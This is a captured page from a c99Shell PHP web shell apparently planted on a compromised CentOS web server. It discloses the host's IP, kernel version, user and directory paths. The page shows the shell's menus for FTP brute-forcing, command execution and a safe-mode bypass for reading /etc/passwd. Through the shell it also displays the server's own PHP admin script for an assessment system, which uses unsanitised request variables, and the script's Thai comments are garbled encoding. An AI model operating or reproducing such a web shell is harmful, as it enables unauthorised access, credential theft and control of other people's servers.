110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/eassess/admin/ drwxr-xr-x Free 52.3 GB of 127.8 GB (40.92%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

include_once "../global1.php";

include_once "../../class/clsDB.php";

include_once "../../class/clsConnection.php";

include_once "../class/clsSectionRQ.php";

include_once "../class/clsHeaderQuestion.php";

include_once "../class/clsHeaderScore.php";

include_once "../class/clsDetailScore.php";



$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);



//echo "UsedAss = ".$UsedAss;

//echo "<br> score_amount_UsedAss = ".$score_amount_UsedAss;



//-------  SectionRQ ,HeaderQuestion, HeaderScore, DetailScore -------



$objSRQ = new SectionRQ($oC);

$objHQ = new HeaderQuestion($oC);

$objHS = new HeaderScore($oC);

$objDS = new DetailScore($oC);



//echo "method = ".$method;



//----------------------For SectionRQ--------------------------

if($method=="add"){

        $objSRQ->AddNew();

        $objSRQ->sectionRQid=$sectionRQid;

        $objSRQ->assid=$assid;

        $objSRQ->topicSectionRQ=$topicSectionRQ;

        $objSRQ->sequenceRQ=$sequenceRQ;

        $objSRQ->Save();

} else if($method == "edit"){

        $objSRQ->SearchByKey($sectionRQid);

        $objSRQ->GetRecord();

        $objSRQ->Edit();

        $objSRQ->sectionRQid=$sectionRQid;

        $objSRQ->assid=$assid;

        $objSRQ->topicSectionRQ=$topicSectionRQ;

        $objSRQ->sequenceRQ=$sequenceRQ;

        $objSRQ->Save();

} else if($method=="delete"){

        $objSRQ->SearchByKey($sectionRQid);

        $objSRQ->GetRecord();

        $objSRQ->Delete();

}



//----------------------For HeaderQuestion-----------------

//echo "<br>**** numHQ = ".$numHQ;

if($numHQ == 0){

    //if($method =="add") аѕФиБўйНБЩЕ

        $getHQid = $objHQ->GetNextCode();

        $getHSid = $objHQ->GetNextCode();

        $objHQ->AddNew();

        $objHQ->HQid=$getHQid;

        $objHQ->assid=$assid;

        $objHQ->sectionRQid=$sectionRQid;

        $objHQ->HSid=$getHSid;

        $objHQ->HQtext=$HQtext;

        $objHQ->Save();

}else{

    //if($method =="edit")  НСѕаґ·ўйНБЩЕ

        $objHQ->SearchByKey($HQid);

        $objHQ->GetRecord();

        $objHQ->Edit();

        $objHQ->HQid=$HQid;

        $objHQ->assid=$assid;

        $objHQ->sectionRQid=$sectionRQid;

        $objHQ->HSid=$HSid;

        $objHQ->HQtext=$HQtext;

        $objHQ->Save();

}

    if($method =="delete"){

        $objHQ->SearchByKey($HQid);

        $objHQ->GetRecord();

        $objHQ->Delete();

    }



//----------------------For HeaderScore-----------------

//echo "<br>**** numHS = ".$numHS;

if($numHS == 0){

        //if($method =="add") аѕФиБўйНБЩЕ

        $objHS->AddNew();

        $objHS->HSid=$HSid;

        $objHS->HStext=$HStext;

        $objHS->score_amount=$score_amount;

        $objHS->Save();

}else{

        //if($method =="edit")  НСѕаґ·ўйНБЩЕ

        //ЎГіХ·Хибєє»ГРаБФ№дґйгЄйг№ЎТГ»ГРаБФ№бЕйЗ  ¤иТўН§ score_amount ЁРйhidden а»з№µСЗб»ГЄЧиН

        //score_amount_UsedAss аѕЧиНв»ГбЎГБЁРдґйдБиКСєК№г№КиЗ№ўН§ javascript г№Л№йТїНГмБ

        if($UsedAss == 0){

            $objHS->SearchByKey($HSid);

            $objHS->GetRecord();

            $objHS->Edit();

            $objHS->HSid=$HSid;

            $objHS->HStext=$HStext;

            $objHS->score_amount=$score_amount;

            $objHS->Save();

        }else{

            $objHS->SearchByKey($HSid);

            $objHS->GetRecord();

            $objHS->Edit();

            $objHS->HSid=$HSid;

            $objHS->HStext=$HStext;

            $objHS->score_amount=$score_amount_UsedAss;

            $objHS->Save();

        }

}



    if($method=="delete"){

        $objHS->SearchByKey($HSid);

        $objHS->GetRecord();

        $objHS->Delete();

    }



//----------------------For DetailScore-------------------

//echo "<br>----numDS = ".$numDS;

//echo "<br> +++ HSid = ".$HSid;

if($numDS == 0){

    //if($method =="add") аѕФиБўйНБЩЕ    



for($i=0; $i<sizeof($DStext); $i++){

        $objDS->AddNew();

        $objDS->DSid=$DSid;

        //$objDS->HSid=$HSid; а»ЕХиВ№а»з№ getHSid 

        //аѕЧиНґЦ§ HSid ЁТЎµТГТ§ HeaderQuestion БТгКи

        $objDS->HSid=$getHSid;

        $objDS->DStext=$DStext[$i];

        $objDS->score=$score[$i];

        $objDS->CTFirst=$CTFirst[$i];

        $objDS->CTLast=$CTLast[$i];

        $objDS->Save();

    }    

}else{    //ЎГіХБХ¤иТг№ DB бЕйЗЛГЧН numDS > 0

    //ЕєаѕЧиННСѕаґ·гЛБи

    if($UsedAss == 0){

        for($i=0; $i<sizeof($DStext); $i++){

                $objDS->SearchByKeyHSid($HSid);

                $objDS->GetRecord();

                $objDS->Delete();

        }

        for($i=0; $i<sizeof($DStext); $i++){

            $objDS->AddNew();

            $objDS->DSid=$DSid;

            $objDS->HSid=$HSid;

            $objDS->DStext=$DStext[$i];

            $objDS->score=$score[$i];

            $objDS->CTFirst=$CTFirst[$i];

            $objDS->CTLast=$CTLast[$i];

            $objDS->Save();

        }

    }

}



if($method=="delete"){

    $objDS->SearchByKey($DSid);

    $objDS->GetRecord();

    $objDS->Delete();

}



echo "<meta http-equiv='refresh' content='0; URL=createForm.php?assid=$assid'>";

//-------------------end obj------------------

//$objSRQ->Close();

//$objHQ->Close();

//$objHS->Close();

//$objDS->Close();

//$oC->Disconnect();

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: